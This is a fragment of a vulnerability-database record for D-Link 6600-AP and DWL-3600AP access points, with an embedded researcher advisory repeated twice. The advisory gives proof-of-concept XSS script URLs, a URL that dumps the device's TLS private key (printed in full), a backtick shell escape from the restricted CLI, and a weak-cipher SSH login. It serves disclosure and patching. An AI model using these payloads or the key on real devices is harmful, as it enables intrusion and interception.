"id": "VHN-146268"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146268"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"date": "2019-08-01T13:15:13.960000",
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29144"
},
{
"date": "2019-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-146268"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007260"
},
{
"date": "2019-08-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1640"
},
{
"date": "2024-11-21T04:26:31.550000",
"db": "NVD",
"id": "CVE-2019-14332"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Vulnerability related to cryptographic strength in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007260"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1640"
}
],
"trust": 0.6
}
}
VAR-201908-0913
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated denial of service leading to the reboot of the AP via the admin.cgi?action=%s URI. D-Link 6600-AP and DWL-3600AP The device contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0913",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14335",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14335",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29142",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-146271",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14335",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-14335",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14335",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14335",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29142",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1636",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146271",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-14335",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29142"
},
{
"db": "VULHUB",
"id": "VHN-146271"
},
{
"db": "VULMON",
"id": "CVE-2019-14335"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007582"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1636"
},
{
"db": "NVD",
"id": "CVE-2019-14335"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated denial of service leading to the reboot of the AP via the admin.cgi?action=%s URI. D-Link 6600-AP and DWL-3600AP The device contains an authentication vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR 